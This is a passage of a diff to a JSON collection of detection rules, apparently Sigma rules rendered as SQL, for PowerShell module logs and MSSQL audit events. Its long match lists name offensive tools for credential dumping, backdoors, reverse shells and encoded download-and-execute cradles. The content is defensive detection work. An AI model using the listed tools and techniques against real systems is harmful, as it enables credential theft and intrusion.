'\\' OR Payload LIKE '%Export-ADR%' ESCAPE '\\' OR Payload LIKE '%Export-ADRCSV%' ESCAPE '\\' OR Payload LIKE '%Export-ADRExcel%' ESCAPE '\\' OR Payload LIKE '%Export-ADRHTML%' ESCAPE '\\' OR Payload LIKE '%Export-ADRJSON%' ESCAPE '\\' OR Payload LIKE '%Export-ADRXML%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ADIDNS%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE 
'%Get-KerberosAESKey%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload 
LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE 
'%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload 
LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%New-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR Payload LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' 
ESCAPE '\\'))" ], - "filename": "win_mssql_disable_audit_settings.yml" + "filename": "posh_pm_malicious_commandlets.yml" }, { - "title": "MSSQL Add Account To Sysadmin Role", - "id": "08200f85-2678-463e-9c32-88dce2f073d1", + "title": "Invoke-Obfuscation STDIN+ Launcher - PowerShell Module", + "id": "9ac8b09b-45de-4a07-9da1-0de8c09304a3", "status": "experimental", - "description": "Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare legitimate administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sysadmin%' ESCAPE '\\' AND Data LIKE '%statement:alter server role [sysadmin] add member %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+powershell.+(?:\\$\\{?input\\}?|noexit).+\"')" ], - "filename": "win_mssql_add_sysadmin_account.yml" + "filename": "posh_pm_invoke_obfuscation_stdin.yml" }, { - "title": "MSSQL Extended Stored Procedure Backdoor Maggie", - "id": "711ab2fe-c9ba-4746-8840-5228a58c3cb8", - "status": "experimental", - "description": "This rule detects the execution of the extended storage procedure backdoor named Maggie in the context of Microsoft SQL server", - "author": "Denis Szadkowski, DIRT / DCSO CyTec", + "title": "Bad Opsec Powershell Code Artifacts", + "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "status": "test", + "description": "focuses on trivial 
artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", + "author": "ok @securonix invrep_de, oscd.community", "tags": [ - "attack.persistence", - "attack.t1546" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate extended stored procedures named maggie" + "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '8128' AND Message LIKE '%maggie%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" ], - "filename": "win_mssql_sp_maggie.yml" + "filename": "posh_pm_bad_opsec_artifacts.yml" }, { - "title": "MSSQL XPCmdshell Suspicious Execution", - "id": "7f103213-a04e-4d59-8261-213dddf22314", + "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", + "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", "status": "experimental", - "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure is used to execute commands", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:xp\\_cmdshell%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object 
System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "win_mssql_xp_cmdshell_audit_log.yml" + "filename": "posh_pm_susp_invocation_specific.yml" }, { - "title": "MSSQL SPProcoption Set", - "id": "b3d57a5c-c92e-4b48-9a79-5f124b7cf964", + "title": "Malicious PowerShell Scripts - PoshModule", + "id": "41025fd7-0466-4650-a813-574aaacbe7f4", "status": "experimental", - "description": "Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.persistence" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of the feature by administrators (rare)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Application' AND Provider_Name = 'MSSQLSERVER' AND EventID = '33205' AND Data LIKE '%object\\_name:sp\\_procoption%' ESCAPE '\\' AND Data LIKE '%statement:EXEC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%Add-ConstrainedDelegationBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-RemoteRegBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Add-ScrnSaveBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Check-VM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ConvertTo-ROT13.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Copy-VSS.ps1%' 
ESCAPE '\\' OR ContextInfo LIKE '%Create-MultipleSessions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DNS\\_TXT\\_Pwnage.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Do-Exfiltration.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%DomainPasswordSpray.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download\\_Execute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Download-Execute-PS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enabled-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Enable-DuplicateToken.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-Command-MSSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-DNSTXT-Code.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Execute-OnTime.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%ExetoText.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Exploit-Jboss.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-AVSignature.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-Fruit.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-GPOLocation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Find-TrustedDocuments.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireBuster.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%FireListener.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ApplicationHost.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ChromeDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ClipboardContents.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ComputerDetail.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-FoxDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPAutologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE 
'%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE 
'\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' 
OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE 